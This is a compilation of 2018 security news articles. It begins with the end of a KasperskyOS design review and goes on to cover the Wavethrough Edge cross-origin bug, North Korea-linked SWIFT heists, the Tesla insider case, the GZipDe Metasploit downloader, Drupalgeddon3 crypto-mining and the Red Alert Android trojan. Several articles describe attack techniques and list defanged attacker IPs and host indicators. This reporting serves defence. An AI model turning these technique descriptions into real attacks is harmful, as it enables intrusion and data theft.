Only those operating systems that took information security requirements into consideration during development can ensure proper implementation of security mechanisms without impacting their functional capabilities. The use of a secure-by-design approach is a key requirement for the final solution to be certified to Common Criteria standard, starting with EAL4. Examples of secure-by-design operating systems are seL4, INTEGRITY RTOS, MUEN RTOS, KasperskyOS and several others.


From the very start, KasperskyOS was created to meet the most rigid information security requirements. It was based on advanced practices and approaches to creating secure systems, in line with the requirements of all essential security standards. In light of this, KasperskyOS can be considered a truly secure operating system from its inception.

KasperskyOS uses microkernel architecture in which the microkernel system tools divide the system into security domains, or ‘entities’ in KasperskyOS terms. All communications between security domains (inter-process communications, IPC) are performed using the microkernel – and controlled by it. No communications are allowed to bypass the microkernel.

All communications are typed: the interface of the entities is described in IDL (Interface Definition Language), and only this interface can be used for IPCs. This is where KasperskyOS differs significantly from most other operating systems.

The KasperskyOS microkernel operates in conjunction with Kaspersky Security System (KSS), which is a subsystem that calculates security verdicts. For each IPC, the KasperskyOS microkernel requests a verdict from KSS, which it uses as a basis for permitting or blocking that particular IPC. For verdict calculation, it is not only the fact and type of communication that is taken into account but also the system’s topology, the context in which the communication takes place, as well as the assigned policy described within the framework of a set of formal security models.

KSS supports a large number of formal security models, for example, Domain Type Enforcement, Object Capability, Role-Based Access, diverse temporal logic dialects, etc. New models can be added when required.

This provides the developer with a flexible tool to describe security policies with as high a level of detail as required. We are not aware of any other solution that provides this degree of detail.

Security policies are defined in a high-level language, which greatly simplifies the verification of the solution in accordance with stipulated requirements. This also makes it possible to run formal verification of the described properties[1].

If we consider systems with limited functional capabilities that perform a limited set of functions, theoretically it’s possible to provide the specified security properties and guarantee there are no vulnerabilities in the software code.

As a solution grows progressively more complex, the addition of different protocols, algorithms, functions, etc. makes it impossible to guarantee there are no vulnerabilities in it. Special measures must be taken to ensure these vulnerabilities cannot be exploited or that their exploitation does not lead to undesirable consequences. These protection measures should include isolation of processes, restricted access to resources, attack detection systems and countermeasures, etc. In that case, the security properties must be guaranteed by the system’s trusted components, i.e., by the OS kernel, security features, subsystems providing specific types of protection, such as cryptographic protection, etc.

At the same time, the relevant security policies need to be defined in an increasingly detailed way, and there comes a point when the capabilities of policy refinement reach a limit. For example, capability-based policies can allow or deny access to a certain resource, though there is no ability to define a situation in which such access would be contingent on something. In such cases, the required security properties are considered functional requirements, and are implemented in the solution’s code along with its other features. This leads to a progressive growth in the volume of the code base that needs to be controlled, and ensuring its verifiability becomes an increasingly challenging task. Consequently, the solution again becomes insecure.

With the help of KasperskyOS and KSS, it’s possible to provide as detailed a description of security properties as desired, and through decomposition of the solution it’s possible to select a limited set of individual modules containing the minimum required functions that require verification. These modules can be viewed as standalone and isolated – their verification then becomes easy.

The code base of KSS responsible for implementing the solution’s security policies can be generated, is formally verifiable[2] and, in this sense, it is trusted. This solves the problem of uncontrolled growth of the code base to which requirements of trust are imposed.

Since security properties are defined regardless of the functional logic, the developer can construct a security system for their solutions without taking into account the details of how specific components are implemented.

The described capabilities of KasperskyOS make it possible to follow a natural course of developing secure solutions that includes the following steps:

Threat analysis and threat modeling.
Development of a set of formal security policies to counter the threats described in step 1.
Decomposition of the solution into security domains, and definition of IPC interfaces in line with the data obtained at step 2.
Implementation of the solution in line with the data obtained at step 3, and configuration of security policies aligned with the results obtained at step 2.
The ability to follow the described process of development is an important methodological advantage over other operating systems. This ensures a key advantage of KasperskyOS: complex systems can be built to meet specific information security characteristics.

KasperskyOS supports virtualization with the help of the Kaspersky Secure Hypervisor (KSH) application. Its key feature is that it can work together with KSS to implement security policies related to the control of virtual machine access to the hypervisor’s internal resources. KSH is a lightweight solution. This makes it possible to verify its code base and means it can be viewed as being part of a trusted platform. The hypervisor can apply KSS verdicts to its internal processes even in situations where cross-domain interaction does not take place.

This capability does not exist in any other virtualization solutions; it is only possible to set rules to define how a specific virtual machine interacts with other isolated components of the system.

Conclusion
Now, in the internet-of-things era, cybersecurity issues surrounding connected devices are becoming increasingly critical. In our opinion, it is the security of the operating system that defines the overall level of cybersecurity of an entire embedded system. Unfortunately, issues of information security are still not given sufficient consideration during the development of operating systems. For nearly half of the operating systems we have considered, information security aspects are either not addressed whatsoever, or the functions associated with information security are implemented at a level that is unsatisfactory.

We hope that this review will, firstly, encourage the developers of operating systems for embedded systems to devote more attention to issues of cybersecurity, and, secondly, help developers choose an operating system for their projects. After all, it’s important for all of us that the internet of things doesn’t grow into an internet of threats.


Supreme Court of the US Police ruled that police need warrant for mobile location data
24.6.2018 securityaffairs BigBrothers

The Supreme Court of the US ruled that police must obtain a search warrant before obtaining mobile location data from mobile carriers and similar services.
The Supreme Court of the United States ruled this week that law enforcement must obtain a search warrant before obtaining cell phone location information from mobile carriers or third-party services.

“When the government tracks the location of a cell phone it achieves near perfect surveillance, as if it had attached an ankle monitor to the phone’s user,” Chief Justice John Roberts wrote in the 5-4 opinion.” reported The Wall Street Journal.

“Unlike the nosy neighbor who keeps an eye on comings and goings,” he wrote, the signal towers and processing centers that track cellphone users “are ever alert, and their memory is nearly infallible,” making analog-era precedents prosecutors cited to justify such warrantless searches all but obsolete.”

location data

The decision aims at preventing surveillance activities operated by the government and protecting the privacy of the citizens under the Fourth Amendment.

The Supreme Court ruled that a warrant is also needed to access location data stored by mobile carriers and similar companies, this data allows to monitor almost any activity of citizens.

“While individuals regularly leave their vehicles, they compulsively carry cell phones with them all the time. A cell phone faithfully follows its owner beyond public thoroughfares and into private residences, doctor’s offices, political headquarters, and other potentially revealing locales.” continues Chief Justice John Roberts.

“Critically, because location information is continually logged for all of the 400 million
devices in the United States – not just those belonging to persons who might happen to come under investigation – this newfound tracking capacity runs against everyone.”

Of course, the authorities can operate without a warrant when there are situations of danger for life of citizens or when handling national security issues.

The ruling came in the wake of Timothy Carpenter v. US case filed in 2011, when the US police arrested members of a gang who committed armed robberies at several stores.

Gang members confessed the group was led by Timothy Carpenter, a version that was verified by the Police obtaining a court order for Carpenter’s cell phone location information and verifying the presence of the suspect near the robberies.

Carpenter was condemned to more than 100 years in prison, but lawyers for the American Civil Liberties Union that represented him at the high court defined the decision “a truly historic vindication of privacy rights.”

The lawyers argued that a court order should not have been enough to obtain access to the mobile’s location data of the suspect, and a search warrant should have been obtained instead.

The Supreme Court ruling was praised by privacy advocated because it aims at defending the privacy of the citizens against any abuse.


Wavethrough CVE-2018-8235 flaw in Microsoft Edge leaks sensitive data
24.6.2018 securityaffairs
Vulnerebility

A flaw in the Edge browser, dubbed Wavethrough, addressed by latest Microsoft Patch Tuesday for June 2018 could be exploited to read restricted data.
A bug in the Edge browser addressed by latest Microsoft Patch Tuesday for June 2018 could be exploited by attackers via malicious or compromised websites to read restricted data.

The flaw was reported by Google developer Jake Archibald, it was tracked as CVE-2018-8235 and ties the way the browser handles requests of different origins.

“A security feature bypass vulnerability exists when Microsoft Edge improperly handles requests of different origins.” reads the security advisory published by Microsoft.

“The vulnerability allows Microsoft Edge to bypass Same-Origin Policy (SOP) restrictions, and to allow requests that should otherwise be ignored. An attacker who successfully exploited the vulnerability could force the browser to send data that would otherwise be restricted.”

An attacker could exploit the vulnerability to force the browser to leak restricted data. The attack scenarios could involve maliciously crafted websites, compromised domains, or websites that accept or host content provided by the user or advertisements.

The flaw was dubbed Wavethrough because the issue occurs when a site leverages service for the loading of multimedia content, and the < audio > web API, which leverages “range” requests.

“Browsers use this for resuming downloads, but it’s also used by media elements if the user seeks the media, so it can go straight to that point without downloading everything before it, or to pick up metadata if it’s one of those annoying media formats that has important metadata at the end of the file.” wrote Archibald.

“Unfortunately, via a service worker, that Range header was going missing (dun-dun-dunnnnnnnnn!). This is because media elements make what we call “no-cors” requests. Let’s push that onto the stack too”

The problem is caused by the fact that the Range header was missing via a service worker because media elements make “no-cors” requests.

“If you fetch() something from another origin, that origin has to give you permission to view the response. By default the request is made without cookies, and if you want cookies to be involved, the origin has to give extra permission for that.” continues the researcher.

“If you want to send fancy headers, the browser checks with the origin first, before making the request with the fancy headers. This is known as CORS.”

The expert highlighted that using special headers, the browser might also check with the origin before making the request, but some APIs ignore the checks resulting in the leakage of sensitive data.

The researcher observed that a “No-cors” request is sent with cookies and receive opaque responses, this implies that some APIs may access the data in these responses.

“Take <img> for instance. If you include an <img> that points to another origin, it’ll make a no-cors request to that origin using that origin’s cookies. If valid image data is returned, it’ll display on your site. Although you can’t access the pixel data of that image, data is still leaked through the width and height of the image. You also know whether or not you received valid image data.” concluded the expert.

“Let’s say there’s an image that’s only accessible if the user is logged into a particular site. An attacker can tell from the load/error event of the <img> whether that user is logged into that site. The user’s privacy has been compromised. Yaaaay.”

Archibald described an attack scenario based on a specially crafted website that allowed him to discover that the beta and nightly versions of Firefox could allow the redirect and eventually exposed the duration of the requested audio. The bug was already patched by Mozilla.

The expert discovered that Edge was vulnerable, but the browser also allowed the resulting audio to pass through the web audio API. An attacker could exploit the flaw to monitor the samples being played. Expert noticed that the request is made with cookies, this means that the attack revealed content otherwise accessible only if the user is logged in.

“It means you could visit my site in Edge, and I could read your emails, I could read your Facebook feed, all without you knowing,” concluded the expert.


According to the experts, North Korea is behind the SWIFT attacks in Latin America
24.6.2018 securityaffairs APT Hacking

SWIFT hackers continue to target banks worldwide, the last string of attacks hit financial institutions across Latin America.
According to three people with knowledge of the matter cited by Cyberscoop the attacks were carried by North Korea-linked APT groups that targeted also other banks

Recent attacks hit Mexico’s Bancomext and Chile’s Bank of Chile, in both cases the attackers used a variant of the dreaded disk wiper KilllDisk to infect the systems of the banks and steal funds through the SWIFT payment system.

“North Korea was involved in both breaches, the sources said, adding that they were tied to others that haven’t yet been disclosed.” states Cyberscoop.

“Two sources reviewed inside information about the breach investigations, which are still ongoing. Confidential technical reports about the incidents are already being shared within private information sharing groups comprised of other financial institutions.”

Investigations conducted by many security firms on past security breaches always linked North Korea to the attacks against the SWIFT systems.

At the time it is not clear attack vector, but experts believe hackers targeted the banks with spear phishing campaigns or using credentials obtained from other breaches.

Bancomtext and Bank of Chile aren’t the only victims of the hackers, the Mexican financial institution Banorte suffered a similar security breach.

North Korea-linked hackers appeared as focused on financial institutions in Latin America, Eastern Europe, and Southeast Asia.

“SWIFT doesn’t comment on the attribution of cyberattacks – that is a question for law enforcement – but we can say that the cyber threat facing the financial community is fast increasing in terms of sophistication … [we’re unaware of] evidence that SWIFT’s own network or core messaging services have ever been compromised. Rather, in each of the incidents customers first suffered security breaches within their local environments.” reads statement send by a SWIFT spokesperson via email.

Once the hackers have penetrated the organizations, they will usually exploit vulnerabilities in a banks funds’ “transfer initiation environments,” to steal credentials and make fraudulent and irrevocable transfers.

Attackers also adopted “diversionary smokescreens” by using wiper malware to make hard the attribution of the attack and the response to the incidents.

“Shared malware variants between the multiple incidents, known as”MBR Killer” and “Bootwreck/killdisk,” caused systems to wipe boot data and other forensic records. The North Korean hackers have been seen using a combination of different wipers in their attacks.” added CyberScoop.

“The group who attacked the Mexican bank used both in their attack,” said Fernando Merces, a senior threat researcher with Trend Micro, an international cybersecurity firm. “There was also an MBR Killer used in a Taiwanese bank a few years ago … The financial sector sees these attacks most frequently. The attacks have been seen globally.”

The use of the MBR Killer alone doesn’t represent an evidence of the involvement of a specific threat actor because its code was posted to a cybercrime forum and was reused by a wide range of actors.

In this case, forensic experts collected other indicators suggesting the involvement of the North Korea’s “Lazarus Group” in Latin America.

“CyberScoop obtained a confidential intelligence report, labelled “TLP: Amber,” authored May 29 by New York-based intelligence firm Flashpoint. That report further connected MBR Killer to the Chile case. The report states that this module had been “leveraged to hide the evidence of successful bank network penetrations.”” concludes CyberScoop.

Even if the attackers attempted to destroy any evidence, the analysis of TTPs allows attributing the attack to Pyongyang.

“Attackers often delete any evidence of fraudulent transactions on victim’s local system, but SWIFT can … [provide] the header data of the messages that SWIFT received from the impacted organization,” the SWIFT spokesperson added.

According to the Mexican financial media outlet, El Financiero hackers compromised Mexico’s interbank transfer system, aka “Sistema de Pagos Electrónicos Interbancarios” (SPEI), with the FALLCHILL, a RAT associated with North Korea-linked APT groups.


Tesla Breach: Malicious Insider Revenge or Whistleblowing?

23.6.2018 securityweek  Virus

Tesla Breach

Just before midnight last Sunday evening (June 17, 2018), Elon Musk sent an email to all staff. He was dismayed, he said, to learn about a Tesla employee "making direct code changes to the Tesla Manufacturing Operating System under false usernames and exporting large amounts of highly sensitive Tesla data to unknown third parties."

This was a mainstream malicious insider attack -- but there may be more to it than meets the eye. The motive, according to Musk, was revenge: "he wanted a promotion that he did not receive." But this incident goes way beyond simple revenge sabotage, and includes the theft of sensitive data and the export of that data to unknown outside parties.

The incident could have been triggered by revenge and aggravated by bribery; but until and unless those outside parties can be identified for certain, the true cause of the attack will remain speculative.

Musk himself is willing to speculate with insinuation. "As you know," he told employees, "there are a long list of organizations that want Tesla to die. These include Wall Street short-sellers, who have already lost billions of dollars and stand to lose a lot more." He then added oil and gas companies, who "rumor has it... are sometimes not super nice;" and the "big gas/diesel car company competitors [who already cheat on pollution levels, and] maybe they're willing to cheat in other ways?" The only potential risks he excluded were nation-states wishing to give their own nascent industries a technology boost, cyber criminals wishing to ransom Tesla or sell to competitors, and -- dare we say it -- whistleblowing.

Such is the nature of attribution for cybercrimes, it may never be known who -- if anyone outside of the malicious insider himself -- is really behind the incident. Sometimes it is only national intelligence agencies who know who did what on the internet through their much wider access to signals intelligence -- but those same agencies can equally feel that it is not in the national interest to get involved. If it was a foreign nation dabbling in IP theft, the intelligence agencies might go public. If it was a competitor or major national industry, the agencies might take the view that their role is not law enforcement.

In reality, the destination of the stolen data may already be known.

The attack itself seems to be typical insider work, using false usernames. We don't know whether those false usernames were existing accounts, or new accounts created by the attacker. In either case, however, it seems certain that the attacker enjoyed higher system privileges than was necessary.

“This," comments Joseph Carson, chief security scientist at Thycotic, "is a major reminder why privileged access management (PAM) is a must-have for organizations that deal with sensitive information or personal information -- and why least-privilege is a practice being adopted by many organizations."

It's a problem made more difficult, he suggests, because companies try to protect the privileged accounts they know about, which in most cases isn't effective. "Organizations continue to fail at the most important aspect of restricting privileged access, which is proactively discovering privileged accounts in the environment. It appears that Tesla have failed to do that most important step in least-privilege, which is discovering and detecting unapproved privileged access."

Since Musk's original disclosure of the breach by internal email on Sunday, matters have moved forward rapidly. On Wednesday, Tesla filed a complaint against the employee -- named as Martin Tripp -- in the Nevada District Court. This complaint admits that "Tesla has only begun to understand the full scope of Tripp’s illegal activity, but he has thus far admitted to writing software that hacked Tesla’s manufacturing operating system (“MOS”) and to transferring several gigabytes of Tesla data to outside entities."

Within a few months of Tripp joining Tesla, says the complaint, "his managers identified Tripp as having problems with job performance and at times being disruptive and combative with his colleagues. As a result of these and other issues, on or about May 17, 2018, Tripp was assigned to a new role. Tripp expressed anger that he was reassigned. Thereafter, Tripp retaliated against Tesla by stealing confidential and trade secret information and disclosing it to third parties, and by making false statements intended to harm the company."

But according to a report published today by the BBC, Tripp "says he’s a whistleblower being smeared for speaking out about standards and safety at the company, and deserves protection." The implication is that Tripp provided the documents used by Business Insider in its June 4 report; 'Internal documents reveal Tesla is blowing through an insane amount of raw material and cash to make Model 3s, and production is still a nightmare'.

The BBC also publishes extracts from a rapid-fire email exchange between Musk and Tripp that took place on Wednesday. At one point, Musk writes, "You should ashamed of yourself for framing other people. You're a horrible human being." This is likely a reference to Tripp's hacking software being found on three other employees' computers. The legal complaint alleges, "His hacking software was operating on three separate computer systems of other individuals at Tesla so that the data would be exported even after he left the company and so that those individuals would be falsely implicated as guilty parties."

Tripp responded, "I NEVER 'framed' anyone else or even insinuated anyone else as being involved in my production of documents of your MILLIONS OF DOLLARS OF WASTE, Safety concerns, lying to investors/the WORLD. Putting cars on the road with safety issues is being a horrible human being!"

Whistleblowing is one optional reason for the data theft not mentioned by Musk in his June 17 email to staff, even though the Business Insider allegation mentions 'internal documents' and was published two weeks earlier. The full truth of what happened in this incident is likely to be exposed in court rather than via computer forensics.

However, in information security terms, an insider stole sensitive documents from Tesla. The motive is not as important as the act. It seems that Tesla does not operate adequate least-privilege measures, and does not have an internal traffic monitoring system capable of detecting and blocking the unsanctioned exfiltration of gigabytes of data. This failure has left Tesla with a PR nightmare that it must now manage.


New Encrypted Downloader Delivers Metasploit Backdoor
23.6.2018 securityweek 
Virus

A series of cyber-attacks targeting the Middle Eastern region use an encrypted downloader to deliver a Metasploit backdoor, AlienVault reports.

The attacks start with a malicious document containing parts of an article about the next Shanghai Cooperation Organization Summit, originally published at the end of May on a Middle Eastern news network.

The Office document contains malicious macro code designed to execute a Visual Basic script (stored as a hexadecimal stream) and launch a new task in a hidden Powershell console. This attack stage is meant to serve a .NET downloader that uses a custom encryption method to obfuscate process memory and evade antivirus detection.

Dubbed GZipDe, the downloader appears based on a publicly available reverse-tcp payload to which the malware author added a new layer of encryption payload.

“It consists of a Base64 string, named GZipDe, which is zip-compressed and custom-encrypted with a symmetric key algorithm, likely to avoid antivirus detection,” AlienVault reveals.

A new memory page with execute, read and write privileges is created, then a decrypted payload is executed. Courtesy of a special handler that controls process’ access to system resources, only one instance of the malware can run at the same time.

Shellcode in the downloader connects to a server at 175.194.42[.]8 to deliver the final payload. The server wasn’t up during analysis, but it was previously recorded serving a Metasploit payload, the security researchers note.

Metasploit has become a popular choice among threat actors, and was previously seen being used in targeted attacks associated with the Turla hackers.

The Metasploit payload delivered from 175.194.42[.]8, AlienVault says, contains a shellcode to bypass system detection, as well as a Meterpreter payload. This malicious program is a powerful backdoor capable of gathering information from the system. The malware also stays in contact with the command and control server to receive further commands.

The shellcode, the researchers explain, loads the entire DLL into memory, meaning that it works without writing information to the disk.

Called reflective DLL injection, this technique allows the attacker to “transmit any other payload in order to acquire elevated privileges and move within the local network,” AlienVault concludes.


"Wavethrough" Bug in Microsoft Edge Leaks Sensitive Information
23.6.2018 securityweek 
Vulnerebility

A security vulnerability patched by Microsoft earlier this month in its Edge browser could be exploited via malicious or compromised websites to read restricted data.

Tracked as CVE-2018-8235, the flaw occurs in how “Microsoft Edge improperly handles requests of different origins,” Microsoft explains in an advisory. The issue results in Edge bypassing Same-Origin Policy (SOP) restrictions and allows for requests that should otherwise be ignored.

As a result, an attacker could exploit the vulnerability to force the user’s browser to send data otherwise restricted. Attacks could be performed via maliciously crafted websites, compromised domains, or through websites that accept or host user-provided content or advertisements.

The vulnerability was discovered by Google developer Jake Archibald, who named it Wavethrough, because the bug occurs when a site uses service workers for the loading of multimedia content, and the < audio > web API, which makes use of “range” requests.

The Range headers can be used by “media elements if the user seeks the media, so it can go straight to that point without downloading everything before it,” Archibald explains.

What the security researcher discovered was that, via a service worker, the Range header was missing, because media elements make “no-cors” requests.

“If you fetch() something from another origin, that origin has to give you permission to view the response. By default the request is made without cookies, and if you want cookies to be involved, the origin has to give extra permission for that,” he notes.

When using special headers, the browser might also check with the origin before making the request, but some APIs ignore the checks, which could result in sensitive data being leaked. No-cors request are sent with cookies and receive opaque responses, and some APIs may access the data in these responses.

Thus, when a media element makes a no-cors request with a Range header, fetch() removes the header, because it isn’t allowed in no-cors requests. However, because Range requests were never standardized in HTML, and because service workers are involved, a website could respond to them arbitrary.

“You can respond to a request however you want, even if it's a no-cors request to another origin. For example, you can have an <img> on your page that points to facebook.com, but your service worker could return data from twitter.com,” the researcher explains.

After setting up a website that would do just that, Archibald discovered that the beta and nightly versions of Firefox allowed the redirect and eventually exposed the duration of the requested audio. The bug was patched before it made it to the stable Firefox release.

Edge too was found vulnerable, but it also allowed the resulting audio to pass through the web audio API, thus allowing for the monitoring of the samples being played. Because the request is made with cookies, the attack revealed content otherwise accessible only if the user is logged in.

“It means you could visit my site in Edge, and I could read your emails, I could read your Facebook feed, all without you knowing,” the researcher points out.

In addition to getting the bug addressed in Firefox and Edge, Archibald has been working on changing the standards regarding Range requests, so as to eliminate similar security issues. Furthermore, his discovery resulted in CORB being added to fetch().


Crooks exploit CVE-2018-7602 Drupal flaw, aka Drupalgeddon3 to deliver Monero miner
23.6.2018 securityaffairs
Vulnerebility

Crooks are attempting to exploit a recently patched Drupal vulnerability, tracked as CVE-2018-7602, to drop Monero mining malware onto vulnerable systems.
The CVE-2018-7602 flaw is a highly critical remote code execution issue, also known as Drupalgeddon3, that was addressed by the Drupal team in
April with the release of versions 7.59, 8.4.8 and 8.5.3.

The security patch for the flaw only works if the fix for the original Drupalgeddon2 vulnerability (CVE-2018-7600) has been installed on the install.

In May, security experts at Malwarebytes reported that crooks were exploiting both Drupalgeddon2 and Drupalgeddon3 to deliver cryptocurrency miners, remote administration tools (RATs) and tech support scams.

Now experts from Trend Micro reported network attacks exploiting CVE-2018-7602 flaw for Monero-mining. Crooks used an exploit to fetch a shell script that retrieves an Executable and Linkable Format-based (ELF) downloader.

The malicious code adds a crontab entry to automatically update itself and to download and execute a modified variant of the open-source XMRig (version 2.6.3) Monero miner.

“We were able to observe a series of network attacks exploiting CVE-2018-7602, a security flaw in the Drupal content management framework. For now, these attacks aim to turn affected systems into Monero-mining bots.” reads the analysis published by TrendMicro.

“While these attacks currently deliver resource-stealing and system performance-slowing malware, the vulnerability can be used as a doorway to other threats.”

The attackers used to hide their activity behind the Tor network, experts tracked it to 197[.]231[.]221[.]211, an address that belongs to a range of IPs associated with a virtual private network (VPN) provider.

The downloader checks the target machine to determine if it could be compromised using the Drupal exploits.

Once executed, the miner will change its process name to [^$I$^] and access the file /tmp/dvir.pid.

“This is a red flag that administrators or information security professionals can take into account to discern malicious activities, such as when deploying host-based intrusion detection and prevention systems or performing forensics,” continues the report.

CVE-2018-7602

The actors behind this attack hide behind the Tor network, but Trend Micro says they were able to trace the activity to 197[.]231[.]221[.]211, an IP belonging to a virtual private network (VPN) provider.

Trend Micro confirmed that its experts have blocked 810 attacks coming from this IP address, at the time there is no evidence that all the attacks were related to the Monero-mining payload.

“The bulk of attacks from this IP address exploit Heartbleed (CVE-2014-0160). The other attacks we observed exploited ShellShock (CVE-2014-6271), an information disclosure vulnerability in WEB GoAhead (CVE-2017-5674), and a memory leak flaw in Apache (CVE-2004-0113).” states Trend Micro.

“Trend Micro also blocked File Transfer Protocol (FTP) and Secure Shell (SSH) brute-force logins from this IP address.”

Drupal admins urge to install the available patches as soon as possible to avoid being hacked.


Hidden Tunnels: A Favored Tactic to Evade Strong Access Controls
22.6.2018 securityweek  Security

Use of Hidden Tunnels to Exfiltrate Data Far More Widespread in Financial Services Than Any Other Industry Sector

Financial services have perhaps the largest cyber security budgets and are the best protected companies in the private sector. Since cyber criminals generally have little difficulty in obtaining a quick return on their effort, it would be unsurprising to find that financial services are less overtly targeted by average hackers than other, easier targets. At the same time, the data held by finserv is so attractive to criminals that it remains an attractive target for more sophisticated hackers.

Both premises are confirmed in a report (PDF) published this week by Vectra. From August 2017 through January 2018, Vectra's AI-based Cognito cyberattack-detection and threat-hunting platform monitored network traffic and collected metadata from more than 4.5 million devices and workloads from customer cloud, data center and enterprise environments.

An analysis of this data showed that financial services displayed fewer criminal C&C communication behaviors than the overall industry average. This could be caused by the efficiency of large finserv budgets (Bank of America spends $600 million annually, with no upper limit, while JPMorgan Chase spends $500 million annually) warding off basic criminal activity.

Even the much smaller Equifax has a budget of $85 million. But Equifax, with its massive 2017 loss of 145.5 million social security numbers, around 17.6 million drivers' license numbers, 20.3 million phone numbers, and 1.8 million email addresses, demonstrates that finserv is a target for, and can be successfully breached by, the more advanced hackers.

Vectra analyzed the Equifax breach and then compared the attack methodology to what its Cognito platform was finding in other financial services companies -- and it discovered the same breach methodology in other financial services firms. This is the use of hidden tunnels to hide the C&C servers and disguise the exfiltration of data.

Vectra's new analysis shows that the criminal use of hidden tunnels is far more widespread in financial services than in any other industry sector. Across all industries Vectra found 11 hidden exfiltration tunnels disguised as encrypted web traffic (HTTPS) for every 10,000 devices. In finserv, this number jumped to 23. Hidden HTTP tunnels jumped from seven per 10,000 devices to 16 in financial services.

Chris Morales, head of security analytics at Vectra, commented, "What stands out the most is the presence of hidden tunnels, which attackers use to evade strong access controls, firewalls and intrusion detection systems. The same hidden tunnels enable attackers to sneak out of networks, undetected, with stolen data."

"Hidden tunnels are difficult to detect," explains the report, "because communications are concealed within multiple connections that use normal, commonly-allowed protocols. For example, communications can be embedded as text in HTTP-GET requests, as well as in headers, cookies and other fields. The requests and responses are hidden among messages within the allowed protocol."

These hidden tunnels need to be protected at all times, says Will LaSala, director security solutions and security evangelist at OneSpan. "Many app developers put holes through firewalls to make services easier to access from their apps, but these same holes can be exploited by hackers. Using the proper development tools, app developers can properly encrypt and shape the data being passed through these holes."

One of the problems is that developers are rushed to implement a new feature to maintain or gain customers, "and this," he adds, "often leads to situations where a hidden tunnel is created and not secured."

Once a hidden tunnel is established by an attacker, it is almost impossible to detect with traditional security. There is no signature to detect while specially created C&C servers will unlikely show up on reputation lists. Furthermore, because the traffic using a hidden tunnel is ostensibly legitimate traffic, there is no clear anomaly for anomaly detection systems to detect.

What Vectra's analysis shows is that while there may be fewer overt attacks against financial services, the industry is a prime target for advanced hackers willing and able to invest in more covert attacks.

San Francisco, Calif-based Vectra Networks closed a $36 million Series D funding round in February 2018, bringing the total amount raised to date by the company to $123 million.


Red Alert Android Trojan for Rent at $500 Per Month
22.6.2018 securityweek  Android

The Red Alert 2.0 Android Trojan first detailed in September last year is currently available for rent on underground forums at $500 per month, Trustwave reports.

It is also capable of stealing information from the infected devices, including SMS messages and contact details, can block calls from banks, and can also keep in touch with bots via Twitter in the event its command and control (C&C) server is taken online.

When they detailed the threat in September last year, SfyLabs’ researchers said the malware included around 60 60 HTML overlays used to steal login credentials, but also revealed that the Trojan’s actor was constantly releasing updates for their malicious program.

A Trustwave report published this week reveals that the malware author is currently advertising the Trojan as targeting nearly 120 banks in Australia, Austria, Canada, Czech Republic, Poland, Denmark, Germany, France, Lithuania, India, Italy, Ireland, Japan, New Zeeland, Romania, Spain, Sweden, Turkey, United Kingdom, and the United States.

Additionally, the malware developer claims the Trojan is targeting payment systems (PayPal, Airbnb, Coinbase, Poker Stars, Neteller, Skrill, and Unocoin Bitcoin Wallet India) and CC+VBV Grabbers (Amazon, eBay, LINE, GetTaxi, Snapchat, Viber, Instagram, Facebook, Skype, UBER, WeChat, and WhatsApp) too.

Red Alert 2.0 is also advertised as able to intercept and send SMS messages and launch APKs. The author also claims new functionality is being developed, that injects can be built per customer request, and that updates are being released every two weeks. Miscreants can rent the Trojan starting at $200 for 7 days, $500 for a month, or $999 for 2 months.

As part of the analyzed Red Alert 2.0 attack, the malware was being distributed attached to spam messages. Although the threat is currently detected by nearly half of the VirusTotal anti-virus companies, the distribution method is still interesting for an Android malware family.

While analyzing the threat, the researchers discovered that it requests permissions to write, read, and receive SMS messages, make calls, and change network state, consistent with the advertised functionality.

The Trojan also includes services such as a watchdog that ensures it is running, services that register the device bot and wait for commands from the command and control (C&C) server, one that ensures the device is connected to the C&C, one that ensures the malware runs at reboot, and a SMS interceptor.

Another component is in charge of requesting permissions from the user and overlaying templates received from the C&C on top of legitimate apps. The malware also sets itself as the default telephony provider and requests device admin access (which allows it to completely wipe all data from the device).

C&C communication is performed using HTTP POST requests to a specific URL. If the website is not available, the malware attempts to connect with the operator through a Twitter message.

“At the time of our analysis, there were no longer any live C&C servers running and so we were unable to observe any traffic between the malware and the C&C server. We couldn't complete the reverse-engineering of some of the commands due to some issues, including no traffic observed, heavily obfuscated code, but also extremely buggy malware that crashed several times when we sent it a command,” the researchers note.


Hackers Exploit Drupal Flaw for Monero Mining
22.6.2018 securityweek 
Vulnerebility

Network attacks exploiting a recently patched Drupal vulnerability are attempting to drop Monero mining malware onto vulnerable systems, Trend Micro reports.

Tracked as CVE-2018-7602 and considered a highly critical issue that could result in remote code execution, the vulnerability impacts Drupal’s versions 7 and 8 and was addressed in April this year.

The flaw is dubbed Drupalgeddon3 and the patch for it only works if the fix for the original Drupalgeddon2 vulnerability (CVE-2018-7600) has been applied.

Last month, hackers were observed targeting both security vulnerabilities to deliver a variety of threats, including cryptocurrency miners, remote administration tools (RATs) and tech support scams.

Trend Micro now says they noticed network attacks exploiting CVE-2018-7602 to turn affected systems into Monero-mining bots. As part of the observed incidents, the exploit fetches a shell script that retrieves an Executable and Linkable Format-based (ELF) downloader.

The malware adds a crontab entry to automatically update itself and also retrieves and installs a Monero-mining application, a modified variant of the open-source XMRig (version 2.6.3). The use of XMRig is a feature common to most attacks attempting to mine for Monero.

The downloader also checks the target machine to determine whether it is worth compromising.

When executed, the mining application changes its process name to [^$I$^] and accesses the file /tmp/dvir.pid, Trend Micro says.

“This is a red flag that administrators or information security professionals can take into account to discern malicious activities, such as when deploying host-based intrusion detection and prevention systems or performing forensics,” the security firm notes.

The actors behind this attack hide behind the Tor network, but Trend Micro says they were able to trace the activity to 197[.]231[.]221[.]211, an IP belonging to a virtual private network (VPN) provider. This IP address is a Tor exit node.

Over the past month, the security firm has blocked 810 attacks coming from this IP address, but cannot confirm that they were all related to the Monero-mining payload or performed by the same actor.

Most of the attacks attempt to exploit the Heartbleed vulnerability (CVE-2014-0160), while others target ShellShock (CVE-2014-6271), a flaw in WEB GoAhead (CVE-2017-5674), and an old memory leak in Apache (CVE-2004-0113).

“Trend Micro also blocked File Transfer Protocol (FTP) and Secure Shell (SSH) brute-force logins from this IP address. Note that these attacks exploit even old Linux or Unix-based vulnerabilities, underscoring the importance of defense in depth,” the security researchers warn.

Patched Drupal installations should be safe from the recent attacks and site admins are advised to apply the available patches as soon as possible, to ensure their systems remain secure.


GZipDe Downloader spotted serving a Metasploit backdoor
22.6.2018 securityaffairs
Virus

Security experts from AlienVault have spotted a new piece of malware named GZipDe that was used in a cyber-espionage campaign.
GZipDe is downloader that is used by threat actors to fetch other payloads from a server controlled by attackers.

The malware was detected after user from Afghanistan has uploaded a weaponized Word document on VirusTotal service, the document refers to the Shanghai Cooperation Organization Summit.

